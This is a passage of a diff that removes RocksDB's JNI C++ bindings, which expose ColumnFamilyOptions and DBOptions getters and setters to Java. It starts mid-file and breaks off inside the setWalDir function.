-jlong Java_org_rocksdb_ColumnFamilyOptions_maxSuccessiveMerges(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      max_successive_merges;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxSuccessiveMerges
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxSuccessiveMerges(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_successive_merges) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      jmax_successive_merges);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-        max_successive_merges = jmax_successive_merges;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    optimizeFiltersForHits
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ColumnFamilyOptions_optimizeFiltersForHits(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->optimize_filters_for_hits;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setOptimizeFiltersForHits
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setOptimizeFiltersForHits(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean joptimize_filters_for_hits) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->optimize_filters_for_hits =
-          static_cast<bool>(joptimize_filters_for_hits);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    memtableHugePageSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_memtableHugePageSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->memtable_huge_page_size;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMemtableHugePageSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMemtableHugePageSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmemtable_huge_page_size) {
-
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      jmemtable_huge_page_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-        jhandle)->memtable_huge_page_size =
-            jmemtable_huge_page_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    softPendingCompactionBytesLimit
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_softPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->soft_pending_compaction_bytes_limit;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setSoftPendingCompactionBytesLimit
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setSoftPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jsoft_pending_compaction_bytes_limit) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->soft_pending_compaction_bytes_limit =
-          static_cast<int64_t>(jsoft_pending_compaction_bytes_limit);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    softHardCompactionBytesLimit
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_hardPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->hard_pending_compaction_bytes_limit;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setHardPendingCompactionBytesLimit
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setHardPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jhard_pending_compaction_bytes_limit) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->hard_pending_compaction_bytes_limit =
-          static_cast<int64_t>(jhard_pending_compaction_bytes_limit);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    level0FileNumCompactionTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_level0FileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-    jhandle)->level0_file_num_compaction_trigger;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setLevel0FileNumCompactionTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setLevel0FileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_file_num_compaction_trigger) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_file_num_compaction_trigger =
-          static_cast<int32_t>(jlevel0_file_num_compaction_trigger);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    level0SlowdownWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_level0SlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-    jhandle)->level0_slowdown_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setLevel0SlowdownWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setLevel0SlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_slowdown_writes_trigger) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_slowdown_writes_trigger =
-          static_cast<int32_t>(jlevel0_slowdown_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    level0StopWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_level0StopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-    jhandle)->level0_stop_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setLevel0StopWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setLevel0StopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_stop_writes_trigger) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_stop_writes_trigger =
-          static_cast<int32_t>(jlevel0_stop_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxBytesForLevelMultiplierAdditional
- * Signature: (J)[I
- */
-jintArray Java_org_rocksdb_ColumnFamilyOptions_maxBytesForLevelMultiplierAdditional(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto mbflma = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->max_bytes_for_level_multiplier_additional;
-
-  const size_t size = mbflma.size();
-
-  jint* additionals = new jint[size];
-  for (size_t i = 0; i < size; i++) {
-    additionals[i] = static_cast<jint>(mbflma[i]);
-  }
-
-  jsize jlen = static_cast<jsize>(size);
-  jintArray result = env->NewIntArray(jlen);
-  if(result == nullptr) {
-    // exception thrown: OutOfMemoryError
-    delete [] additionals;
-    return nullptr;
-  }
-  env->SetIntArrayRegion(result, 0, jlen, additionals);
-  if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(result);
-      delete [] additionals;
-      return nullptr;
-  }
-
-  delete [] additionals;
-
-  return result;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxBytesForLevelMultiplierAdditional
- * Signature: (J[I)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxBytesForLevelMultiplierAdditional(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jintArray jmax_bytes_for_level_multiplier_additional) {
-  jsize len = env->GetArrayLength(jmax_bytes_for_level_multiplier_additional);
-  jint *additionals =
-      env->GetIntArrayElements(jmax_bytes_for_level_multiplier_additional, 0);
-  if(additionals == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  auto* cf_opt = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  cf_opt->max_bytes_for_level_multiplier_additional.clear();
-  for (jsize i = 0; i < len; i++) {
-    cf_opt->max_bytes_for_level_multiplier_additional.push_back(static_cast<int32_t>(additionals[i]));
-  }
-
-  env->ReleaseIntArrayElements(jmax_bytes_for_level_multiplier_additional,
-      additionals, JNI_ABORT);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    paranoidFileChecks
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ColumnFamilyOptions_paranoidFileChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->paranoid_file_checks;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setParanoidFileChecks
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setParanoidFileChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jparanoid_file_checks) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->paranoid_file_checks =
-          static_cast<bool>(jparanoid_file_checks);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompactionPriority
- * Signature: (JB)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompactionPriority(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jbyte jcompaction_priority_value) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  cf_opts->compaction_pri =
-      rocksdb::CompactionPriorityJni::toCppCompactionPriority(jcompaction_priority_value);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    compactionPriority
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_ColumnFamilyOptions_compactionPriority(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  return rocksdb::CompactionPriorityJni::toJavaCompactionPriority(
-      cf_opts->compaction_pri);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setReportBgIoStats
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setReportBgIoStats(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jreport_bg_io_stats) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  cf_opts->report_bg_io_stats = static_cast<bool>(jreport_bg_io_stats);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    reportBgIoStats
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ColumnFamilyOptions_reportBgIoStats(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  return static_cast<bool>(cf_opts->report_bg_io_stats);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompactionOptionsUniversal
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompactionOptionsUniversal(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jcompaction_options_universal_handle) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  auto* opts_uni =
-      reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(
-          jcompaction_options_universal_handle);
-  cf_opts->compaction_options_universal = *opts_uni;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompactionOptionsFIFO
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompactionOptionsFIFO(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jcompaction_options_fifo_handle) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  auto* opts_fifo =
-      reinterpret_cast<rocksdb::CompactionOptionsFIFO*>(
-          jcompaction_options_fifo_handle);
-  cf_opts->compaction_options_fifo = *opts_fifo;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setForceConsistencyChecks
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setForceConsistencyChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jforce_consistency_checks) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  cf_opts->force_consistency_checks = static_cast<bool>(jforce_consistency_checks);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    forceConsistencyChecks
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ColumnFamilyOptions_forceConsistencyChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  return static_cast<bool>(cf_opts->force_consistency_checks);
-}
-
-/////////////////////////////////////////////////////////////////////
-// rocksdb::DBOptions
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    newDBOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_DBOptions_newDBOptions(JNIEnv* env,
-    jclass jcls) {
-  auto* dbop = new rocksdb::DBOptions();
-  return reinterpret_cast<jlong>(dbop);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    getDBOptionsFromProps
- * Signature: (Ljava/util/String;)J
- */
-jlong Java_org_rocksdb_DBOptions_getDBOptionsFromProps(
-    JNIEnv* env, jclass jclazz, jstring jopt_string) {
-  const char* opt_string = env->GetStringUTFChars(jopt_string, nullptr);
-  if(opt_string == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-
-  auto* db_options = new rocksdb::DBOptions();
-  rocksdb::Status status = rocksdb::GetDBOptionsFromString(
-      rocksdb::DBOptions(), opt_string, db_options);
-
-  env->ReleaseStringUTFChars(jopt_string, opt_string);
-
-  // Check if DBOptions creation was possible.
-  jlong ret_value = 0;
-  if (status.ok()) {
-    ret_value = reinterpret_cast<jlong>(db_options);
-  } else {
-    // if operation failed the DBOptions need to be deleted
-    // again to prevent a memory leak.
-    delete db_options;
-  }
-  return ret_value;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_DBOptions_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* dbo = reinterpret_cast<rocksdb::DBOptions*>(handle);
-  assert(dbo != nullptr);
-  delete dbo;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    optimizeForSmallDb
- * Signature: (J)V
- */
-void Java_org_rocksdb_DBOptions_optimizeForSmallDb(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->OptimizeForSmallDb();
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setEnv
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setEnv(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jenv_handle) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->env =
-      reinterpret_cast<rocksdb::Env*>(jenv_handle);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setIncreaseParallelism
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setIncreaseParallelism(
-    JNIEnv * env, jobject jobj, jlong jhandle, jint totalThreads) {
-  reinterpret_cast<rocksdb::DBOptions*>
-      (jhandle)->IncreaseParallelism(static_cast<int>(totalThreads));
-}
-
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setCreateIfMissing
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setCreateIfMissing(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      create_if_missing = flag;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    createIfMissing
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_createIfMissing(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->create_if_missing;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setCreateMissingColumnFamilies
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setCreateMissingColumnFamilies(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  reinterpret_cast<rocksdb::DBOptions*>
-      (jhandle)->create_missing_column_families = flag;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    createMissingColumnFamilies
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_createMissingColumnFamilies(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>
-      (jhandle)->create_missing_column_families;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setErrorIfExists
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setErrorIfExists(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean error_if_exists) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->error_if_exists =
-      static_cast<bool>(error_if_exists);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    errorIfExists
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_errorIfExists(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->error_if_exists;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setParanoidChecks
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setParanoidChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean paranoid_checks) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->paranoid_checks =
-      static_cast<bool>(paranoid_checks);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    paranoidChecks
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_paranoidChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->paranoid_checks;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setRateLimiter
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setRateLimiter(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jrate_limiter_handle) {
-  std::shared_ptr<rocksdb::RateLimiter> *pRateLimiter =
-      reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(
-          jrate_limiter_handle);
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->rate_limiter = *pRateLimiter;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setLogger
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setLogger(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jlogger_handle) {
-  std::shared_ptr<rocksdb::LoggerJniCallback> *pLogger =
-      reinterpret_cast<std::shared_ptr<rocksdb::LoggerJniCallback> *>(
-          jlogger_handle);
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->info_log = *pLogger;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setInfoLogLevel
- * Signature: (JB)V
- */
-void Java_org_rocksdb_DBOptions_setInfoLogLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jlog_level) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->info_log_level =
-    static_cast<rocksdb::InfoLogLevel>(jlog_level);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    infoLogLevel
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_DBOptions_infoLogLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return static_cast<jbyte>(
-      reinterpret_cast<rocksdb::DBOptions*>(jhandle)->info_log_level);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxTotalWalSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setMaxTotalWalSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_total_wal_size) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_total_wal_size =
-      static_cast<jlong>(jmax_total_wal_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxTotalWalSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_maxTotalWalSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      max_total_wal_size;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxOpenFiles
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setMaxOpenFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max_open_files) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_open_files =
-      static_cast<int>(max_open_files);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxOpenFiles
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_maxOpenFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_open_files;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxFileOpeningThreads
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setMaxFileOpeningThreads(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jmax_file_opening_threads) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_file_opening_threads =
-      static_cast<int>(jmax_file_opening_threads);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxFileOpeningThreads
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_maxFileOpeningThreads(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<int>(opt->max_file_opening_threads);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setStatistics
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setStatistics(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jstatistics_handle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  auto* pSptr =
-      reinterpret_cast<std::shared_ptr<rocksdb::StatisticsJni>*>(
-          jstatistics_handle);
-  opt->statistics = *pSptr;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    statistics
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_statistics(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  std::shared_ptr<rocksdb::Statistics> sptr = opt->statistics;
-  if (sptr == nullptr) {
-    return 0;
-  } else {
-    std::shared_ptr<rocksdb::Statistics>* pSptr =
-        new std::shared_ptr<rocksdb::Statistics>(sptr);
-    return reinterpret_cast<jlong>(pSptr);
-  }
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setUseFsync
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setUseFsync(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean use_fsync) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->use_fsync =
-      static_cast<bool>(use_fsync);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    useFsync
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_useFsync(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->use_fsync;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setDbPaths
- * Signature: (J[Ljava/lang/String;[J)V
- */
-void Java_org_rocksdb_DBOptions_setDbPaths(
-    JNIEnv* env, jobject jobj, jlong jhandle, jobjectArray jpaths,
-    jlongArray jtarget_sizes) {
-  std::vector<rocksdb::DbPath> db_paths;
-  jlong* ptr_jtarget_size = env->GetLongArrayElements(jtarget_sizes, nullptr);
-  if(ptr_jtarget_size == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return;
-  }
-
-  jboolean has_exception = JNI_FALSE;
-  const jsize len = env->GetArrayLength(jpaths);
-  for(jsize i = 0; i < len; i++) {
-    jobject jpath = reinterpret_cast<jstring>(env->
-        GetObjectArrayElement(jpaths, i));
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->ReleaseLongArrayElements(
-          jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-      return;
-    }
-    std::string path = rocksdb::JniUtil::copyString(
-        env, static_cast<jstring>(jpath), &has_exception);
-    env->DeleteLocalRef(jpath);
-
-    if(has_exception == JNI_TRUE) {
-        env->ReleaseLongArrayElements(
-            jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-        return;
-    }
-
-    jlong jtarget_size = ptr_jtarget_size[i];
-
-    db_paths.push_back(
-        rocksdb::DbPath(path, static_cast<uint64_t>(jtarget_size)));
-  }
-
-  env->ReleaseLongArrayElements(jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->db_paths = db_paths;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    dbPathsLen
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_dbPathsLen(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jlong>(opt->db_paths.size());
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    dbPaths
- * Signature: (J[Ljava/lang/String;[J)V
- */
-void Java_org_rocksdb_DBOptions_dbPaths(
-    JNIEnv* env, jobject jobj, jlong jhandle, jobjectArray jpaths,
-    jlongArray jtarget_sizes) {
-  jlong* ptr_jtarget_size = env->GetLongArrayElements(jtarget_sizes, nullptr);
-  if(ptr_jtarget_size == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return;
-  }
-
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  const jsize len = env->GetArrayLength(jpaths);
-  for(jsize i = 0; i < len; i++) {
-    rocksdb::DbPath db_path = opt->db_paths[i];
-
-    jstring jpath = env->NewStringUTF(db_path.path.c_str());
-    if(jpath == nullptr) {
-      // exception thrown: OutOfMemoryError
-      env->ReleaseLongArrayElements(
-          jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-      return;
-    }
-    env->SetObjectArrayElement(jpaths, i, jpath);
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(jpath);
-      env->ReleaseLongArrayElements(
-          jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-      return;
-    }
-
-    ptr_jtarget_size[i] = static_cast<jint>(db_path.target_size);
-  }
-
-  env->ReleaseLongArrayElements(jtarget_sizes, ptr_jtarget_size, JNI_COMMIT);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setDbLogDir
- * Signature: (JLjava/lang/String)V
- */
-void Java_org_rocksdb_DBOptions_setDbLogDir(
-    JNIEnv* env, jobject jobj, jlong jhandle, jstring jdb_log_dir) {
-  const char* log_dir = env->GetStringUTFChars(jdb_log_dir, nullptr);
-  if(log_dir == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->db_log_dir.assign(log_dir);
-  env->ReleaseStringUTFChars(jdb_log_dir, log_dir);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    dbLogDir
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_DBOptions_dbLogDir(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return env->NewStringUTF(
-      reinterpret_cast<rocksdb::DBOptions*>(jhandle)->db_log_dir.c_str());
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWalDir
- * Signature: (JLjava/lang/String)V
- */
-void Java_org_rocksdb_DBOptions_setWalDir(
-    JNIEnv* env, jobject jobj, jlong jhandle, jstring jwal_dir) {
-  const char* wal_dir = env->GetStringUTFChars(jwal_dir, 0);
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->wal_dir.assign(wal_dir);
